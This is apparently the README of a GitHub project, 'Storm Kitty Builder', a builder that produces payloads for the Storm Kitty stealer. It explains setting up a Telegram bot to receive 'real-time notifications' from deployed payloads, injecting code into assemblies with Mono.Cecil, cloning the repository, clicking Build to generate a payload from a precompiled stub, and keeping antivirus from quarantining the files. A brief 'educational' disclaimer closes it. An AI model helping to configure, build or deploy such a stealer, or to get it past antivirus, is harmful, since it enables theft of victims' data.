Storm Kitty Builder is a clean and efficient builder designed for creating customizable payloads for Storm Kitty. Fully supports Telegram-based alerts and leverages Mono.Cecil for dynamic assembly manipulation.
- β Standalone EXE builder interface
- π§© Modular stub and payload integration
- π‘ Telegram bot support for real-time notifications
- 𧬠Uses Mono.Cecil to inject and manipulate assemblies
- π Organized and clean project layout
To build and use Storm Kitty Builder, ensure the following:
- .NET Framework (4.x recommended)
- Windows OS (for builder GUI & stub execution)
- Optional: Visual Studio Code or Visual Studio for code editing
Storm Kitty Builder supports Telegram integration for live alert delivery. To enable:
- Open Telegram and start a chat with @BotFather.
- Run
/newbot, assign it a name and username (e.g.,StormKittyNotifierBot). - Copy your bot token.
- Replace the placeholder
TELEGRAM_BOT_TOKENandCHAT_IDin your configuration file or code. - Get your
CHAT_IDby sending a message to your bot and visiting:
https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getUpdates
// Example
string telegramToken = "YOUR_TELEGRAM_BOT_TOKEN";
string chatId = "YOUR_TELEGRAM_CHAT_ID";-
Download or clone the repository:
git clone https://github.com/Vector-OS/Storm-Kitty-Builder
-
Open the solution in Visual Studio or run the
StormKittyBuilder.exedirectly. -
Configure Telegram credentials inside the builder interface or config file.
-
Click Build to generate the payload using the
stub.exe.
Storm-Kitty-Builder/
β
βββ .vscode/ # VS Code settings (optional)
β
βββ StormKittyBuilder/ # Main builder logic and resources
β
βββ stub/ # Stub directory
β βββ stub.exe # Precompiled stub used in payload creation
β
βββ Mono.Cecil.dll # Core Mono.Cecil library
βββ Mono.Cecil.Mdb.dll # Mono.Cecil debug support
βββ Mono.Cecil.Pdb.dll # Mono.Cecil PDB support
βββ Mono.Cecil.Rocks.dll # Mono.Cecil extensions
β
βββ StormKittyBuilder.exe # Compiled builder application
βββ Readme.txt # Legacy usage info
βββ debug.txt # Debugging output log
βββ LICENSE # Project license
βββ README.md # You're reading it!
- Make sure your antivirus does not block or quarantine
stub.exeorStormKittyBuilder.exeduring testing. - Telegram alerts must have a valid bot token and chat ID.
- Always test in a controlled, secure environment.
This tool is intended strictly for educational and authorized penetration testing purposes only. The developer is not responsible for any illegal use or damage caused by this tool.
If you find this project helpful:
- β Star the repository
- π οΈ Submit feature requests or issues
- π€ Pull requests are welcome!
Crafted with β‘ by Vector-OS